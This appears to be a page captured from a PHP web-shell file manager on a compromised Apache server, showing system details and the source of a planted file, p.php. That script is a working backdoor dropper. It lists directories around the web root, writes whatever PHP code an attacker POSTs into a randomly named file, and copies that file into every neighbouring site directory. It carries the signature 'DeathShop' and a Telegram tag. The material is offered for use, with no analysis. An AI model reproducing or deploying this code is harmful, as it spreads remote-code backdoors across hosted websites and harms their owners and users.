HEX
Server: Apache
System: Linux uyu7574470001-7d78c9ff74-xfpwm 4.19.91-21.al7.x86_64 #1 SMP Wed Sep 2 19:47:49 CST 2020 x86_64
User: ()
PHP: 7.4.16
Disabled: chmod,exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,socket_create_listen,socket_create_pair,socket_create,socket_get_option,socket_getpeername,socket_getsockname,socket_last_error,socket_listen,socket_read,socket_recv,socket_recvfrom,socket_select,socket_send,socket_sendto,socket_set_block,socket_set_nonblock,socket_set_option,socket_shutdown,socket_strerror,socket_write,stream_socket_client,stream_socket_server,pfsockopen,disk_total_space,disk_free_space,chown,diskfreespace,getrusage,get_current_user,getmyuid,getmypid,dl,leak,listen,chgrp,link,symlink,dlopen,proc_nice,proc_get_stats,proc_terminate,shell_exec,sh2_exec,posix_getpwuid,posix_getgrgid,posix_kill,ini_restore,mkfifo,dbmopen,dbase_open,filepro,filepro_rowcount,posix_mkfifo,putenv,sleep,fsockopen
$ pwd: /usr/home/uyu7574470001/htdocs/
Upload Files
File: /usr/home/uyu7574470001/htdocs/p.php
<?php

function generateRandomString($length) {
    $characters = 'abcdefghijklmnopqrstuvwxyz';
    $charLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charLength - 1)];
    }
    return $randomString;
}

function method1() {
    $currentPath = dirname($_SERVER['DOCUMENT_ROOT']);

    if ($currentPath === false) {
        echo "Unable to determine the current path.";
        return;
    }

    $contents = scandir($currentPath);

    if ($contents === false) {
        echo "Unable to list the contents of the current path.";
        return;
    }
    echo json_encode($contents);
}

function method2() {
    $currentPath = $_SERVER['DOCUMENT_ROOT'];

    if ($currentPath === false) {
        echo "Unable to determine the current path.";
        return;
    }

    $contents = scandir($currentPath);

    if ($contents === false) {
        echo "Unable to list the contents of the current path.";
        return;
    }
    echo json_encode($contents);
}

if (isset($_GET['met1'])) {
    method1();
} else if (isset($_GET['met2'])) {
    method2();
} else if (isset($_GET['actmet1'])) {
    $sc = $_POST['file'];
    $nama = generateRandomString(8);
    $filePath = $nama . '.php';
    
    $dead = fopen($filePath, "w");
    if ($dead === false) {
        echo "Failed to open the file for writing.";
    } else {
    
        if (fwrite($dead, $sc) === false) {
            echo "Failed to write to the file.";
        } else {
            fclose($dead);
            $currentPath = dirname($_SERVER['DOCUMENT_ROOT']);
            $contents = scandir($currentPath);
            foreach ($contents as $a) {
                $newpath = $currentPath . '/' . $a . '/' . $nama . '.php';
                $badman = @copy($filePath, $newpath);
                if ($badman) {
                    echo $a . '/' . $nama . '.php' . '|';
                }
            }
        }
    }
} else if (isset($_GET['actmet2'])) {
    $sc = $_POST['file'];
    $nama = generateRandomString(8);
    $filePath = $nama . '.php';
    
    $dead = fopen($filePath, "w");
    if ($dead === false) {
        echo "Failed to open the file for writing.";
    } else {
    
        if (fwrite($dead, $sc) === false) {
            echo "Failed to write to the file.";
        } else {
            fclose($dead);
            $currentPath = $_SERVER['DOCUMENT_ROOT'];
            $contents = scandir($currentPath);
            foreach ($contents as $a) {
                $newpath = $currentPath . '/' . $a . '/' . $nama . '.php';
                $badman = @copy($filePath, $newpath);
                if ($badman) {
                    echo $a . '/' . $nama . '.php' . '|';
                }
            }
        }
    }
} else {
    echo 'DeathShop';
}
?>
@ Telegram